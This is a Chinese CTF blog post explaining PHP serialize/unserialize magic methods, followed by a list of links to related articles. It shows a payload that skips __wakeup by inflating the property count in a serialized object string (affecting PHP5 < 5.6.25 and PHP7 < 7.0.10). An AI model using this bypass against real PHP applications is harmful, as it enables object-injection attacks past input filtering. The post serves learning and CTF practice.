关于unserialize绕过__wakeup

最新推荐文章于 2023-08-28 19:43:52 发布
最新推荐文章于 2023-08-28 19:43:52 发布
阅读量1.4k 收藏 2
点赞数 1
分类专栏: CTF 文章标签: unserialize绕过__wakeup
我希望自己永远怀着一颗学习的心!
本文链接:https://blog.csdn.net/q1352483315/article/details/89561132
版权

unserialize 和 serialize的注意点:

__construct():当对象创建(new)时会自动调用。但在 unserialize() 时是不会自动调用的。(构造函数)
__destruct():当对象被销毁时会自动调用。(析构函数)
__wakeup():unserialize() 时会自动调用。

DEMO

class Demo
{
    public $data;
    public function __construct($data)
    {
        $this->data = $data;
        echo "construct<br />";
    }
    public function __wakeup()
    {
        echo "wake up<br />";
    }
    public function __destruct()
    {
        echo "Data's value is $this->data. <br />";
        echo "destruct<br />";
    }
}
var_dump(serialize(new Demo("raw value")));

结果:

construct
Data's value is raw value. 
destruct
string 'O:4:"Demo":1:{s:4:"data";s:9:"raw value";}' (length=42)

最后的语句改为这样试试看:
unserialize('O:4:"Demo":1:{s:4:"data";s:15:"malicious value";}');

结果:

wake up
Data's value is malicious value. 
destruct

这里也说明了__wakeup():unserialize() 时会自动调用

我们在反序列化的时候 可能有时候__wakeup 中会进行一些过滤等等的操作 所以我们需要尝试绕过

绕过的条件

反序列化中object的个数和之前的个数不等

payload

unserialize('O:4:"Demo":2:{s:4:"data";s:15:"malicious value";}');

结果:

Data's value is malicious value. 
destruct

影响版本

PHP5 < 5.6.25, PHP7 < 7.0.10

小鱼儿waha
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php序列化绕过wakeup,PHP反序列化漏洞#XCTF题 : unserialize3#绕过wakeup()函数
weixin_42544461的博客
03-22 475
1.代码与结果代码如下:class xctf{public $flag='111';public function __wakeup(){exit('bad requests');}}$content = new xctf();echo serialize($content);?>结果如下:O:4:"xctf":1:{s:4:"flag";s:3:"111";}实验截图:2.相关姿势点2.1...
php中magic_quotes_gpc对unserialize的影响分析
10-25
主要介绍了php中magic_quotes_gpc对unserialize的影响,以实例的形式分析了magic_quotes_gpc安全过滤对unserialize造成的影响以及对此的解决方法,非常具有实用价值,需要的朋友可以参考下
__wakeup()绕过
v2ish1yan的博客
04-23 6609
__wakeup函数是在php在使用反序列化函数unserialize()时,自动调用的函数 如xctf-unserialize3 只要序列化的中的成员数大于实际成员数,即可绕过 如 <?php class xctf { public $flag = '111'; public function __wakeup() { exit('bad requests'); } } $a=new xctf(); var_dump(seri
ctf-php反序列化绕过__wakeup
qq_32445755的博客
05-19 2138
注意:PHP 将所有以 __(两个下划线)开头的类方法保留为魔术方法。所以在定义类方法时,除了上述魔术方法,建议不要以 __ 为前缀。 __wakeup()是用在反序列化操作中。unserialize()检查存在一个__wakeup()方法。如果存在,则先调用__wakeup()方法。 部分代码 class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 此时需要绕过__
绕过__wakeup() 反序列化 合集
Jay17的博客
08-24 1366
绕过__wakeup() 反序列化 合集
CTF必看~ PHP反序列化漏洞6:绝妙_wakeup绕过技巧
Eason_LYC安全白帽子的成长博客
05-22 3706
_wakeup()是 PHP 中一个特殊的魔术方法。它在反序列化一个对象时被自动调用,允许开发者在对象从序列化格式还原为可用的 PHP 对象之前对其进行某些特殊处理。这个方法可以接受任意的参数,但在实际使用中,它通常不需要参数。
PHP_DataSet.rar_DataSet p
09-14
PHP提供了`serialize()`和`unserialize()`函数来实现这一点。 8. **数据绑定**:在ASP.NET中,DataSet可以方便地与控件进行数据绑定。在PHP中,可以创建方法将DataSet的数据绑定到HTML表格或其他展示组件。 具体到...
PHP中json_encode、json_decode与serializeunserialize的性能测试分析
10-29
今天偶然在想,如果用PHP写一个类似BDB的基于文件的Key-Value小型数据库用于存储非结构化的记录型数据,不知道效率如何?
Unpack_ACV.zip_acv _audition
09-24
PHP提供了内置函数如`unserialize`和`gzuncompress`等,用于解析序列化数据或解压gzip格式的文件。在处理"acv"文件时,可能需要编写PHP代码来读取、解析内部数据结构,以便进一步操作或分析。 3. **文件解包和解析*...
php_igbinary-1.1.1-5.6
12-26
此外,`igbinary`还提供了`igbinary_serialize`和`igbinary_unserialize`两个函数,以供开发者在需要自定义序列化行为时使用。 总的来说,`php_igbinary-1.1.1-5.6`版本的`igbinary`扩展是优化PHP应用性能的有效...
PHP反序列化中如何绕过_wakeup()函数的一些技巧
最新发布
m0_63138919的博客
08-28 1238
本文为魔术方法_wakeup()的一些绕过用法
unserialize函数和__wakeup魔术方法
Home to come
04-18 658
之前做过unserialize的题,当时看了wp,做是做出来来了,但是没有看懂这到底是什么东东,这次再次碰见了,认真的搜索了一下原理 什么是serialize? PHP 序列化后的内容是简单的文本格式,但是对字母大小写和空白(空格、回车、换行等)敏感,而且字符串是按照字节(或者说是 8 位的字符)计算的,因此,更合适的说法是 PHP 序列化后的内容是字节流格式。因此用其他语言实现时,如果所实现的...
PHP序列化及反序列化绕过
qq_46041723的博客
11-18 3113
序列化和反序列化及绕过前言序列化和反序列化序列化反序列化反序列化绕过ctf题目实例 前言 本菜鸡本着菜死人不偿命的觉悟,接着迈向了ctf的世界。 废话不多说,今天来谈一下PHP的序列化和反序列化还有一些绕过姿势 序列化和反序列化 序列化 在PHP里面存在一个serialize方法来实现序列化功能。 Serializable { /* 方法 */ abstract public serialize ( ) : string abstract public unserialize ( string $seria
PHP反序列化漏洞-CVE-2016-7124(绕过__wakeup)复现
笑花大王
01-30 2883
前言 最近电脑也不知怎么了时不时断网而且我竟然找不出原因!!!很诡异.... 其他设备电脑都OK唯独我的电脑 时好时坏 我仿佛摸清了我电脑断网的时间段所以作息时间都改变了 今天12点多断网刷了手机陪家人取超市 看到小区门口都挺严格的进出要身份证 去超市还要测体温。之后回来睡觉到6点起来家里做了火锅hhhhh 吃了之后继续学习序列化漏洞emmmm 等又该睡觉了 一天又结束了! ...
[SWPUCTF 2021 新生赛]no_wakeup
YangYubo091699的博客
10-16 1252
[SWPUCTF 2021 新生赛]no_wakeup
PHP反序列化-__wakeup()方法漏洞(CVE-2016-7124)
bin789456的博客
08-13 3631
写在前面 wakeup()是在反序列化的基础之上进行的,如果你不是很清楚反序列化漏洞,可以点击下方: [超链接] 漏洞影响的版本 PHP5 < 5.6.25 PHP7 < 7.0.10 漏洞利用方法 若在对象的魔法函数中存在的__wakeup方法,那么之后再调用 unserilize() 方法进行反序列化之前则先调用__wakeup方法,但是序列化字符串中表示对象属性个数的值大于真实的属性个数时跳过__wakeup的执行 漏洞出现情况 1.可以之间或简介控制序列化结果 2.__wakeup(
php unserialize()函数,php函数serialize()与unserialize()用法实例
weixin_42519489的博客
03-16 303
本文实例讲述了php函数serialize()与unserialize()用法。分享给大家供大家参考。具体方法如下:该实例主要讲述了php函数serialize()与unserialize()说明及案例。想要将已序列化的字符串变回 PHP 的值,可使用unserialize()。serialize()可处理除了resource之外的任何类型。甚至可以serialize()那些包含了指向其自身引用的...
unserialize入门练习
xiaobai的博客
08-27 1094
知识点 必须知道的魔术方法: __construct(),类的构造函数 __destruct(),类的析构函数 __call(),在对象中调用一个不可访问方法时调用 __callStatic(),用静态方式中调用一个不可访问方法时调用 __get(),获得一个类的成员变量时调用 __set(),设置一个类的成员变量时调用 __isset(),当对不可访问属性调用isset()或empty()时调用 __unset(),当对不可访问属性调用unset()时被调用。 __sleep(),执行serialize(
反序列化漏洞详解
热门推荐
LJH1999ZN的博客
03-07 3万+
目录 一、什么是序列化和反序列化 二、什么是反序列化漏洞 三、序列化函数(serialize) 四、反序列化(unserialize) ​五、什么是PHP魔术方法 六、一些常见的魔术方法 七、魔术方法的利用 八、反序列化漏洞的利用 1.__destruct()函数 2.__wakeup() 3.toString() ​九、反序列化漏洞的防御 一、什么是序列化和反序列化 序列化是将对象转换为字符串以便存储传输的一种方式。而反序列化恰好就是序列化的逆过程,反序列化将字符串.
$a=unserialize($_GET['p'])
06-07
这段代码存在安全问题,因为未对 `$_GET['p']` 的值进行有效性验证,攻击者可以通过构造特定的请求参数来注入恶意代码,导致代码执行漏洞。建议在使用反序列化时,一定要对输入数据进行有效性验证,以避免此类安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值